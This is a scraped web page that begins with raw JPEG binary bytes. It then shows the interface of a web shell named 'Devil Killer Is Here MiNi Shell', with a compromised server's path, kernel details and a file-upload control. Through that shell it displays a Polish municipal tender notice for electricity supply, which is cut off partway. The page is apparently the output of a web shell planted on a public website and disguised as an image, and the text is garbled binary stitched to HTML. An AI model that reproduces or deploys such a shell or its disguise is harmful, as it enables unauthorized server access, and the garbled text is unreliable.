JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211208/0030555701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa energii elektrycznej dla obiektów Gminy Legnickie Pole, jednostek organizacyjnych Gminy oraz na potrzeby oświetlenia drogowego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Legnickie Pole</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390647481</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kiliana Ignacego Dientzenhofera 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Legnickie Pole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-241</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">768582867</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@legnickiepole.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.legnickiepole.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa energii elektrycznej dla obiektów Gminy Legnickie Pole, jednostek organizacyjnych Gminy oraz na potrzeby oświetlenia drogowego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a7345ddf-581f-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00305557</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.legnickiepole.pl/przetargi-zamowienia <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://bip.legnickiepole.pl/przetargi-zamowienia</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępnym<br/>pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Regulaminie ePUAP.5. Maksymalny<br/>rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia i wycofania<br/>oferty oraz do komunikacji wynosi 150 MB</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający udostępnia dane osobowe, o których mowa<br/>w art. 10 rozporządzenia 2016/679, w celu umożliwienia korzystania ze środków ochrony prawnej, do<br/>upływu terminu na ich wniesienie.<br/>2. Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą.<br/>3. Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia<br/>2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.W przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1<br/>rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych osobowych zawartych w<br/>protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o<br/>udzielenie zamówienia Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o<br/>których mowa w art. 18 ust. 2 rozporządzenia 2016/679.<br/>5. Ograniczenia zasady jawności, o których mowa w ust. 3 i art. 18 ust. 3-6 Pzp, stosuje się<br/>odpowiednio.<br/>6. W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego,<br/>z uprawnienia, o którym mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, Zamawiający może żądać<br/>od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu<br/>sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>7. Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania<br/>lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może<br/>naruszać integralności protokołu postępowania oraz jego załączników.<br/>8. W postępowaniu są przetwarzane dane osobowe podlegające ochronie zgodnie z przepisami<br/>ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz.U. z 2019 r. poz. 1781) oraz<br/>rozporządzenia 2016/679. Dane te mogą dotyczyć w szczególności samego wykonawcy (osoby<br/>fizycznej prowadzącej działalność gospodarczą), jego pełnomocnika (osoby fizycznej), jak też<br/>informacji o osobach, które w swojej ofercie wykonawca przedkłada celem wykazania spełniania<br/>warunków udziału w postępowaniu, braku podstaw do wykluczenia z postępowania, jak i potwierdzenia<br/>wymogów zamawiającego dotyczących wykonania przedmiotu zamówienia.<br/>9. W postępowaniu i po zakończeniu postępowania do przetwarzania danych osobowych osób<br/>fizycznych stosuje się przepisy ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz.U. z<br/>2019 r. poz. 1781) oraz rozporządzenia 2016/679.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679,<br/>zamawiający informuje, że:<br/>1) administratorem danych osobowych osób fizycznych jest Wójt Gminy Legnickie Pole ul.<br/>Dientzenhofera 1, 59-241 Legnickie Pole tel. 76 858 28 10, e-mail sekretariat@legnickiepole.pl;<br/>2) Zamawiający wyznaczył Inspektora Ochrony Danych Mariusz Kania, z którym można się<br/>skontaktować pocztą elektroniczną na adres: iod@centrumbip.pl oraz telefonicznie tel. 697563417,<br/>3) dane osobowe osób fizycznych przetwarzane będą na podstawie art. 6 ust. 1 lit. c rozporządzenia<br/>2016/679 w celu związanym z postępowaniem o udzielenie zamówienia publicznego - „Dostawa<br/>Energii Elektrycznej dla obiektów Gminy Legnickie Pole, jednostek organizacyjnych Gminy oraz na<br/>potrzeby oświetlenia drogowego” Oznaczenie sprawy: ROG.271.19.2021.D.TP,<br/>a) w odniesieniu do danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 rozporządzenia 2016/679;<br/>b) osoba fizyczna posiada:<br/>􀀀 na podstawie art. 15 rozporządzenia 2016/679 prawo dostępu do danych osobowych jej<br/>dotyczących;<br/>􀀀 na podstawie art. 16 rozporządzenia 2016/679 prawo do sprostowania swoich danych osobowych;<br/>􀀀 na podstawie art. 18 rozporządzenia 2016/679 prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2<br/>rozporządzenia 2016/679;<br/>c) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy osoba fizyczna<br/>uzna, że przetwarzanie danych osobowych jej dotyczących narusza przepisy rozporządzenia<br/>2016/679;<br/>4) osobie fizycznej nie przysługuje:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e rozporządzenia 2016/679 prawo do usunięcia danych<br/>osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 rozporządzenia 2016/679;<br/>c) na podstawie art. 21 rozporządzenia 2016/679 prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania danych osobowych osób fizycznych jest art. 6 ust. 1<br/>lit. c rozporządzenia 2016/679.<br/>d) Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia<br/>wszystkich obowiązków formalno-prawnych związanych z udziałem w postępowaniu, w tym również<br/>obowiązków wynikających z rozporządzenia 2016/679, w szczególności obowiązek informacyjnyprzewidziany w art. 13 rozporządzenia 2016/679 względem osób fizycznych, których dane osobowe<br/>dotyczą i od których dane te Wykonawca bezpośrednio pozyskał. Obowiązek informacyjny wynikający<br/>z art. 13 rozporządzenia 2016/679 nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba<br/>fizyczna, której dane dotyczą, dysponuje już tymi informacjami (art. 13 ust. 4 rozporządzenia<br/>2016/679).<br/>e) Wykonawca jest obowiązany wypełnić obowiązek informacyjny wynikający z art. 14 rozporządzenia<br/>2016/679 względem osób fizycznych, których dane przekazuje zamawiającemu i których dane<br/>pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14<br/>ust. 5 rozporządzenia 2016/679.<br/>f) W celu zapewnienia, że Wykonawca wypełnił obowiązki informacyjne wynikające z rozporządzenia<br/>2016/679 oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały<br/>przekazane w związku z ubieganiem się Wykonawcy o udzielenie zamówienia w postępowaniu,<br/>Wykonawca składa w postępowaniu oświadczenie o wypełnieniu przez niego obowiązków<br/>informacyjnych przewidzianych w art. 13 lub art. 14 rozporządzenia 2016/679. Oświadczenie, o którym<br/>mowa w zdaniu pierwszym wykonawca składa w ofercie.<br/>11. Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia<br/>wszystkich obowiązków formalno-prawnych związanych z udziałem w postępowaniu, w tym również<br/>obowiązków wynikających z rozporządzenia 2016/679, w szczególności obowiązek informacyjny<br/>przewidziany w art. 13 rozporządzenia 2016/679 względem osób fizycznych, których dane osobowe<br/>dotyczą i od których dane te wykonawca bezpośrednio pozyskał.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ROG.271.26.2021.D.TP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa energii elektrycznej do lokali i obiektów – część 1 zamówienia 508 781 MWh –<br/>szczegóły dotyczące zużycia poszczególnych PPE zawiera Załącznik nr 1a do SWZ, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09300000-2 - Energia elektryczna, cieplna, słoneczna i jądrowa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert – cena<br/>2. Maksymalnie oferta może otrzymać 100 pkt. Oferta z najniższą ceną otrzyma 100 pkt. W<br/>pozostałych przypadkach liczba punktów będzie obliczana wg poniższego wzoru:<br/>Najniższa oferowana cena spośród złożonych ofert<br/>Punktacja badanej oferty wg kryterium ceny = ---------------------------------------------------------------- x 100<br/>Cena oferty badanej<br/>3. Zamawiający dokona wyboru najkorzystniejszej oferty, tj. oferty która otrzyma największą ilość<br/>punktów. Oferta na każdą z części oceniana będzie odrębnie.<br/>4. Jeżeli w postępowaniu o udzielenie zamówienia, w którym jedynym kryterium oceny ofert jest cena,<br/>nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o<br/>takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie<br/>określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>5. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach.<br/>6. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą.<br/>7. Jeżeli termin związania ofertą upłynął przed wyborem najkorzystniejszej oferty, Zamawiający wzywa<br/>Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez<br/>Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>8. W przypadku braku zgody, o której mowa w ust. 7, Zamawiający zwraca się o wyrażenie takiej zgody<br/>do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba że zachodzą przesłanki do<br/>unieważnienia postępowania.<br/>9. Niezwłocznie po wyborze najkorzystniejszej oferty Zamawiający informuje równocześnie<br/>Wykonawców, którzy złożyli oferty, o:<br/>1) wyborze najkorzystniejszej oferty, podając nazwę albo imię i nazwisko, siedzibę albo miejsce<br/>zamieszkania, jeżeli jest miejscem wykonywania działalności wykonawcy, którego ofertę wybrano, oraz<br/>nazwy albo imiona i nazwiska, siedziby albo miejsca zamieszkania, jeżeli są miejscami wykonywania<br/>działalności wykonawców, którzy złożyli oferty, a także punktację przyznaną ofertom,<br/>2) Wykonawcach, których oferty zostały odrzucone podając uzasadnienie faktyczne i prawne.<br/>10. Zamawiający udostępnia niezwłocznie informacje, o których mowa w ust. 9 pkt 1, na stronie<br/>internetowej prowadzonego postępowania.<br/>11. Jeżeli została złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku<br/>podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz.U.2021, poz.<br/>685), dla celów zastosowania kryterium ceny Zamawiający dolicza do przedstawionej w tej ofercie<br/>ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć. W takiej sytuacji<br/>Wykonawca składając ofertę ma obowiązek:<br/>1) poinformowania Zamawiającego, że wybór jego oferty będzie prowadził do powstania u<br/>Zamawiającego obowiązku podatkowego,<br/>2) wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do<br/>powstania obowiązku podatkowego,<br/>3) wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez<br/>kwoty podatku,<br/>4) wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała<br/>zastosowanie.<br/>12. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczącychtreści złożonych ofert oraz innych składanych dokumentów lub oświadczeń.<br/>13. Zamawiający poprawia w ofercie:<br/>1) oczywiste omyłki pisarskie,<br/>2) oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych<br/>poprawek,<br/>3) inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych<br/>zmian w treści oferty,<br/>niezwłocznie zawiadamiając o tym wykonawcę, którego oferta została poprawiona.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa energii elektrycznej dla potrzeb oświetlenia drogowego – część 2 zamówienia 288<br/>743 MWh – szczegóły dotyczące zużycia poszczególnych PPE zawiera Załącznik nr 1b do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09300000-2 - Energia elektryczna, cieplna, słoneczna i jądrowa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu<br/>oraz spełniają warunki udziału w postępowaniu.<br/>2. Podstawy wykluczenia, o których mowa w art. 108 ust. 1 Pzp<br/>Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę:<br/>1) Będącego osobą fizyczną, którego prawomocnie skazano za przestępstwo:<br/>a) udziału w zorganizowanej grupie przestępczej albo związku mającym na celu popełnienie<br/>przestępstwa lub przestępstwa skarbowego, o którym mowa w art. 258 Kodeksu karnego (art.<br/>108 ust.1 pkt 1 lit. a Pzp);<br/>b) handlu ludźmi, o którym mowa w art. 189a Kodeksu karnego (art. 108 ust. 1 pkt 1 lit. b Pzp);<br/>c) o którym mowa w art. 228-230a, art. 250a, Kodeksu karnego lub w art. 46 lub. art. 48 ustawy z<br/>dnia 25 czerwca 2010r. o sporcie (art. 108 ust.1 pkt 1 lit. c Pzp);<br/>d) finansowania przestępstwa o charakterze terrorystycznym, o którym mowa w art. 165a<br/>Kodeksu karnego, lub przestępstwo udaremniania lub utrudniania stwierdzenia przestępnego<br/>pochodzenia pieniędzy lub ukrywania ich pochodzenia, o którym mowa w art. 299 Kodeksu<br/>karnego (art. 108 ust. 1 pkt 1lit.d Pzp);<br/>e) o charakterze terrorystycznym, o którym mowa w art. 115 §20 Kodeksu karnego, lub mająca<br/>na celu popełnienie tego przestępstwa (art. 108 ust. 1 pkt 1 lit. e Pzp);<br/>f) powierzenia wykonania pracy małoletniemu cudzoziemcowi, o którym mowa w art. 9 ust. 2<br/>ustawy z dnia 15 czerwca 2012r. o skutkach powierzania wykonywania pracy cudzoziemcom<br/>przebywającym wbrew przepisom na terytorium Rzeczypospolitej Polskiej (art. 108 ust. 1 pkt 1<br/>lit. f Pzp);<br/>g) przeciwko obrotowi gospodarczemu, o których mowa w art. 296-307 Kodeksu karnego,<br/>przestępstwo oszustwa, o którym mowa w art. 286 Kodeksu karnego, przestępstwo przeciwko<br/>wiarygodności dokumentów, o których mowa w art. 270-277d Kodeksu karnego, lub<br/>przestępstwo skarbowe (art. 108 ust. 1 pkt 1 lit. g Pzp);<br/>h) o którym mowa w art. 